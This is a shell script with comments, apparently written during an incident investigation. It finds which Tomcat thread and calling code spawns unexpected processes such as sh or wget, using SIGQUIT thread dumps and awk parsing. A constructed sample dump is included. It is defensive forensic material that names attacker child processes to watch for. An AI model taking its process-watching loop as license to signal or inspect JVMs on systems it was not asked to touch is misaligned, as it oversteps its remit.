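# Chris's caveat: make sure the dump comes from the JVM that runs Tomcat.
# Assumes Tomcat runs as user "tomcat" (the ps output shows that user) and is
# started through the stock Bootstrap class.
tomcat_java_pid() { pgrep -u tomcat -f org.apache.catalina.startup.Bootstrap; }

# SIGQUIT (kill -3) makes HotSpot write every thread's stack to the JVM's
# stdout, which with the stock catalina.sh is $CATALINA_BASE/logs/catalina.out.
# The exec() is only visible while it is in flight, so fire this from a loop
# that triggers when an unexpected child (sh, wget) appears under the JVM.
dump_threads() { kill -QUIT "$1"; }

# Constructed sample: one AJP worker thread inside Runtime.exec(), one idle.
SAMPLE_DUMP='"ajp-bio-8009-exec-7" daemon prio=10 tid=0x1 nid=0x22b3 runnable [0x2]
   java.lang.Thread.State: RUNNABLE
        at java.lang.UNIXProcess.forkAndExec(Native Method)
        at java.lang.UNIXProcess.<init>(UNIXProcess.java:135)
        at java.lang.ProcessImpl.start(ProcessImpl.java:130)
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:1022)
        at java.lang.Runtime.exec(Runtime.java:617)
        at com.example.webapp.ReportAction.execute(ReportAction.java:42)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)

"ajp-bio-8009-exec-8" daemon prio=10 tid=0x3 nid=0x22b4 waiting on condition [0x4]
   java.lang.Thread.State: WAITING (parking)
        at sun.misc.Unsafe.park(Native Method)
        at org.apache.tomcat.util.net.JIoEndpoint$Worker.await(JIoEndpoint.java:458)
'

# The JDK frames every external process is spawned through. In a dump,
# threads are blank-line separated records and frames are lines, so awk's
# paragraph mode (RS="") yields one record per thread.
SPAWN='java[.]lang[.](Runtime[.]exec|ProcessBuilder[.]start|ProcessImpl|UNIXProcess)'

# Names of the threads whose stack passes through a spawn frame.
exec_threads() {
    printf '%s\n' "$1" | awk -v pat="$SPAWN" '
        BEGIN { RS = ""; FS = "\n" }
        $0 ~ pat { name = $1; sub(/^"/, "", name); sub(/".*$/, "", name); print name }'
}

# "thread: caller" for each such thread, where caller is the frame just below
# the last JDK spawn frame: the code that asked for the process. That is the
# line to hand to the developers, or to match against a framework advisory.
exec_callers() {
    printf '%s\n' "$1" | awk -v pat="$SPAWN" '
        BEGIN { RS = ""; FS = "\n" }
        $0 ~ pat {
            last = 0
            for (i = 2; i <= NF; i++) if ($i ~ pat) last = i
            if (last == 0 || last == NF) next
            name = $1; sub(/^"/, "", name); sub(/".*$/, "", name)
            caller = $(last + 1); sub(/^[ \t]*at /, "", caller)
            print name ": " caller
        }'
}

# Against the real file once a dump has been taken:
#   exec_callers "$(cat "$CATALINA_BASE/logs/catalina.out")"
exec_callers "$SAMPLE_DUMP"
```

catalina.out accumulates one dump per kill -3, so after a watching loop has fired several times the functions report every matching thread from every dump; that is fine, the caller frame is the same each time. If that frame is in the application's own code, that code is where the command comes from; if it is in a framework such as Struts, the request that reached it is in the access log of the same moment, and the framework advisory is the next thing to read.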